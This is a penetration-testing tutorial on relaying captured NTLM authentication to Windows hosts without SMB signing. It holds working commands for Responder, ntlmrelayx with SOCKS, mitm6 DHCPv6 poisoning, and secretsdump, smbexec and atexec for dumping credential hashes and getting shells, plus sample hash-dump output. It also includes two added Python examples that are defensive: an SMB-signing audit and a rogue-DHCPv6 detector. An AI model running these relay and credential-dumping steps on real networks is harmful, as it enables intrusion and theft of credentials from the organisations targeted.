SMB Relay

This page deals with gaining code execution by relaying NTLMv1/2 authentication, which is a very effective technique.

Introduction

When capturing NTLMv1/2 hashes with tools like Responder, attackers have two options:

  • crack it to retrieve cleartext passwords

  • relay it to gain code execution on a target

The relayed user must have privileges on the target.

Valid targets

In order to relay hashes, we must have valid targets. Valid targets are machines with SMB Signing disabled.

SMB Signing is disabled by default on every Windows OS, except Windows Server.

To create a list file of valid targets, use CrackMapExec:

cme smb <networkIP>/<cidr> --gen-relay-list relayTargets.txt
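
As an added example (not from the original page, and not CrackMapExec's own code), the same check a relay-target list relies on, written from the audit side: send a bare SMB2 NEGOTIATE to each host and read the SecurityMode field of the reply, so that hosts that do not require signing can be found and fixed. Standard library only; the host list on the command line and the port-445 reachability are assumptions.

```python
# Added example: audit whether a host requires SMB signing by reading the
# SecurityMode field of its SMB2 NEGOTIATE response. Standard library only.
import os
import socket
import struct

SMB2_MAGIC = b"\xfeSMB"
SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002   # SecurityMode flags
DIALECTS = (0x0202, 0x0210, 0x0300, 0x0302)          # SMB 2.0.2, 2.1, 3.0, 3.0.2

def build_negotiate_request() -> bytes:
    """NetBIOS session header + 64-byte SMB2 header + NEGOTIATE body, which is
    the first message an SMB2-only client sends (no credentials involved)."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0,
                         0,                          # Command 0 = NEGOTIATE
                         1, 0, 0, 0, 0, 0, 0, b"\0" * 16)
    body = struct.pack("<HHHHI16sQ", 36, len(DIALECTS), SIGNING_ENABLED,
                       0, 0, os.urandom(16), 0)     # random ClientGuid
    body += struct.pack("<%dH" % len(DIALECTS), *DIALECTS)
    msg = header + body
    return struct.pack(">I", len(msg)) + msg        # type 0x00 + 24-bit length

def parse_security_mode(raw: bytes) -> int:
    """SecurityMode of a NEGOTIATE response (raw includes the NetBIOS header)."""
    if len(raw) < 4 + 64 + 4 or raw[4:8] != SMB2_MAGIC:
        raise ValueError("not an SMB2 response")
    status = struct.unpack_from("<I", raw, 4 + 8)[0]
    command = struct.unpack_from("<H", raw, 4 + 12)[0]
    if status != 0 or command != 0:
        raise ValueError("negotiate failed, status 0x%08x" % status)
    structure_size, security_mode = struct.unpack_from("<HH", raw, 4 + 64)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response structure")
    return security_mode

def describe(security_mode: int) -> str:
    if security_mode & SIGNING_REQUIRED:
        return "signing required: protected against relay"
    return "signing not required: exposed to relay, enable required signing"

def check_host(host: str, port: int = 445, timeout: float = 3.0) -> str:
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        raw = s.recv(4096)           # the response fits in a single read
    return describe(parse_security_mode(raw))

if __name__ == "__main__":
    import sys
    for host in sys.argv[1:]:        # usage: python smb_signing_audit.py host...
        try:
            print(host, "->", check_host(host))
        except (OSError, ValueError) as exc:
            print(host, "-> error:", exc)
```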

Capture hashes

To capture NTLMv2 hashes, simply use Responder. Before running it, edit Responder.conf and turn off its SMB and HTTP servers, so that those ports stay free for the relay tool:

[Responder Core]

; Servers to start
SQL = On
; Turn this off
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
; Turn this off
HTTP = Off
HTTPS = On
DNS = On
LDAP = On

Then fire up Responder:

python Responder.py -I <interface> -r -d -w

Relaying hashes

Instead of cracking the hashes Responder captures, we can relay them to our valid targets to gain code execution there. For that purpose, you can use Responder's MultiRelay or Impacket's ntlmrelayx.

With ntlmrelayx, you can keep and reuse sessions instead of executing a one-shot attack.

To use SOCKS support, simply add the -socks switch:

./ntlmrelayx.py -tf relayTargets.txt -socks -smb2support

Since MS08-068, a hash can no longer be relayed back to the machine it came from (a reflective attack).

Abusing IPv6

Until now, we have abused the LLMNR protocol to capture NTLMv2 hashes. It works great, but we can increase the effectiveness of hash relaying by abusing the IPv6 protocol too.

The idea is to reply to the DHCPv6 requests that machines on the network send and set the attacker IP as their IPv6 DNS server. Because Windows prefers IPv6 over IPv4, victims then resolve names through the attacker and are forced to authenticate against the attacker machine.

To use mitm6:

sudo mitm6 -d <domain>

To minimize the impact on the network, the lease expires within 5 minutes after mitm6 is stopped, which removes the DNS server from the victims' configuration.
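
As an added example (not from the original page, and not mitm6's own code), the detection side of this technique: a parser for DHCPv6 ADVERTISE and REPLY messages that extracts the DNS servers they hand out (RFC 3646 option 23) and flags any server not on an allowlist. On a network without a real IPv6 deployment the allowlist is empty, so any DHCPv6 DNS offer is rogue. Standard library only; that no other DHCPv6 client holds UDP port 546 on the monitoring host is an assumption.

```python
# Added example: flag DHCPv6 ADVERTISE/REPLY messages that offer a DNS server
# outside the allowlist, as a rogue DHCPv6 server would. Standard library only.
import ipaddress
import socket
import struct

DHCPV6_ADVERTISE, DHCPV6_REPLY = 2, 7
OPTION_DNS_SERVERS = 23                 # RFC 3646 recursive DNS server list
SERVER_PORT, CLIENT_PORT = 547, 546

def parse_options(payload: bytes):
    """Yield (code, data) for every option after the 4-byte msg-type +
    transaction-id header; stop on a truncated option instead of crashing."""
    off = 4
    while off + 4 <= len(payload):
        code, length = struct.unpack_from(">HH", payload, off)
        off += 4
        if off + length > len(payload):
            break
        yield code, payload[off:off + length]
        off += length

def offered_dns_servers(payload: bytes) -> list:
    """DNS servers an ADVERTISE or REPLY offers; any other message type
    (SOLICIT, REQUEST, ...) gives an empty list."""
    if not payload or payload[0] not in (DHCPV6_ADVERTISE, DHCPV6_REPLY):
        return []
    servers = []
    for code, data in parse_options(payload):
        if code == OPTION_DNS_SERVERS:
            for i in range(0, len(data) - len(data) % 16, 16):
                servers.append(str(ipaddress.IPv6Address(data[i:i + 16])))
    return servers

def rogue_dns_servers(payload: bytes, allowlist) -> list:
    """Offered DNS servers that are not on the allowlist (addresses are
    normalised, so 'fe80:0:0:0:0:0:0:1' and 'fe80::1' compare equal)."""
    allowed = {str(ipaddress.IPv6Address(a)) for a in allowlist}
    return [s for s in offered_dns_servers(payload) if s not in allowed]

def monitor(allowlist):
    """Report rogue offers arriving on the DHCPv6 client port. Offers are
    unicast to the soliciting host, so for network-wide coverage feed the
    UDP 547->546 payloads from a packet capture into rogue_dns_servers()."""
    sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    sock.bind(("::", CLIENT_PORT))      # assumes no other DHCPv6 client holds it
    while True:
        payload, (src, port, *_scope) = sock.recvfrom(4096)
        if port == SERVER_PORT:
            for server in rogue_dns_servers(payload, allowlist):
                print("rogue DHCPv6 DNS offer from %s: %s" % (src, server))

if __name__ == "__main__":
    monitor(allowlist=[])               # no legitimate IPv6 DNS expected here
```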

What to do with sessions?

Chaining these techniques establishes many sessions, which ntlmrelayx lists with the socks command:

ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143
...

To interact with these sessions, you need to edit /etc/proxychains.conf:

[ProxyList]
socks4 <yourIP> 1080

Retrieving local hashes

Then you can retrieve the targets' local hashes with Impacket's secretsdump. You can type anything when prompted for a password, since the relayed SOCKS session is already authenticated:

root@kalibeto # proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
[*] DPAPI_SYSTEM
 0000   01 00 00 00 1C 17 F6 05  23 2B E5 97 95 E0 E4 DF   ........#+......
 0010   47 96 CC 79 1A C2 6E 14  44 A3 C1 9E 6D 7C 93 F3   G..y..n.D...m|..
 0020   9A EC C6 8A 49 79 20 9D  B5 FB 26 79               ....Iy ...&y
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
[*] NL$KM
 0000   EB 5C 93 44 7B 08 65 27  9A D8 36 75 09 A9 CF B3   .\.D{.e'..6u....
 0010   4F AF EC DF 61 63 93 E5  20 C5 4F EF 3C 65 FD 8C   O...ac.. .O.<e..
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK

Getting code execution

You can also obtain a shell with Impacket's smbexec and atexec:

proxychains smbexec.py <domain>/<relayedUser>@192.168.10.60
proxychains atexec.py <domain>/<relayedUser>@192.168.10.60 "<cmd>"

psexec and wmiexec do not work through these sessions (see references).

Using SMBClient

You can also browse the target's shares with smbclient through the proxy:

root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter VULNERABLE\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Thu Dec  7 19:08:00 2017
  Documents and Settings            DHS        0  Tue Jul 14 01:08:10 2009
  pagefile.sys                      AHS 1073741824  Thu May  3 16:32:43 2018
  PerfLogs                            D        0  Mon Jul 13 23:20:08 2009
  Program Files                      DR        0  Fri Dec  1 17:16:28 2017
  Program Files (x86)                DR        0  Fri Dec  1 17:03:57 2017
  ProgramData                        DH        0  Tue Feb 27 15:02:13 2018
  Recovery                          DHS        0  Wed Sep 30 18:00:31 2015
  System Volume Information         DHS        0  Wed Jun  6 12:24:46 2018
  tmp                                 D        0  Sun Mar 25 09:49:15 2018
  Users                              DR        0  Thu Dec  7 19:07:54 2017
  Windows                             D        0  Tue Feb 27 16:25:59 2018

		5216767 blocks of size 4096. 609996 blocks available
smb: \>

Many other protocols can be relayed: IMAP, LDAP, MSSQL, etc. (see references).

References